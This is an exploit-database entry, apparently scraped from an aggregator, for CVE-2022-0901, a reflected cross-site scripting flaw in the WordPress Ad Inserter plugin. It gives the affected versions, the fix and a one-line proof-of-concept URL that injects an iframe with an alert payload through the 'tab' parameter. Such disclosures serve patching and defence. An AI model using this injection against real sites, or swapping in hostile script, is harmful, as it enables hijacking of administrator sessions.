Exploit for WordPress Ad Inserter Cross Site Scripting CVE-2022-0901

Name: Exploit for WordPress Ad Inserter Cross Site Scripting CVE-2022-0901
Rating: 5 (261 reviews)

2022-04-07 | CVSS -0.4

## https://sploitus.com/exploit?id=PACKETSTORM:166626
Tittle:  
WordPress Plugin Ad Inserter < 2.7.12 - Reflected Cross-Site Scripting  
  
References:  
CVE-2022-0901  
  
Author:  
Taurus Omar   
  
Description:  
The plugins do not sanitise and escape the REQUEST_URI before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters  
  
Affects Plugins:  
ad-inserter  
ad-inserter-pro   
Fixed in version 2.7.12  
  
Proof of Concept:  
In a browser which does not encode characters:   
https://example.com/wp-admin/options-general.php?page=ad-inserter.php&start=2&tab=\"><iframe/onload=alert(1)></iframe>   
  
Classification  
Type XSS   
OWASP top 10 A7: Cross-Site Scripting (XSS)  
CWE-79  
  
wpScan:  
https://wpscan.com/vulnerability/85582b4f-a40a-4394-9834-0c88c5dc57ba